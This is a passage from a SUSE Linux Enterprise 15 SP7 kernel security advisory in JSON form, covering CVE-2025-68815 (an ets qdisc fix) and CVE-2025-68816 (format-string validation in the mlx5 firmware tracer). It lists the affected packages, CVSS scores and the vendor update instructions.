srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
